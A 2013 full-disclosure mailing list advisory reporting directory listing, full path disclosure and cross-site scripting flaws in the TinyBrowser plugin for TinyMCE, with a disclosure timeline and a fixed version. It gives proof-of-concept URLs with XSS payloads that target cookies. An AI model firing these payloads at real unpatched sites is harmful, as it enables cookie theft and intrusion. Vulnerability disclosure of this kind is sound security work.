[<prev] [next>] [day] [month] [year] [list]
Message-ID: <00a901cdeeb3$7a1add30$9b7a6fd5@pc>
Date: Wed, 9 Jan 2013 23:51:11 +0200
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>
Subject: Multiple vulnerabilities in TinyBrowser
Hello list!
I want to warn you about multiple vulnerabilities in TinyBrowser for
TinyMCE. These are new vulnerabilities in addition to my 2009 and 2011
advisories about Arbitrary File Upload and Code Execution vulnerabilities in
TinyBrowser. It concerns as TinyBrowser, as all web applications which have
TinyBrowser in core or as third-party plugins for them.
These are Information Leakage, Full path disclosure and Cross-Site Scripting
vulnerabilities.
-------------------------
Affected products:
-------------------------
Vulnerable are old versions of TinyBrowser (such as 1.33 and previous
versions). Last versions are not affected - in TinyBrowser 1.42 these
vulnerabilities are already fixed.
----------
Details:
----------
Information Leakage (Directory Listing) (WASC-13):
http://site/js/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=
http://site/js/tiny_mce/plugins/tinybrowser/edit.php?type=
Listing of site's root directory if there is no upload directory.
Full path disclosure (WASC-13):
In tinybrowser.php and edit.php FPD is shown, if there is no upload
directory.
If to upload script with extensions of an image, then FPD is also shown.
XSS (WASC-08):
http://site/js/tiny_mce/plugins/tinybrowser/upload.php?type=%22);alert(document.cookie)//
For IE:
http://site/js/tiny_mce/plugins/tinybrowser/upload.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie))
http://site/js/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie))
http://site/js/tiny_mce/plugins/tinybrowser/edit.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie))
------------
Timeline:
------------
2013.01.06 - informed developer. In any case these holes are fixed in last
versions of software.
2013.01.08 - disclosed at my site (http://websecurity.com.ua/6247/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists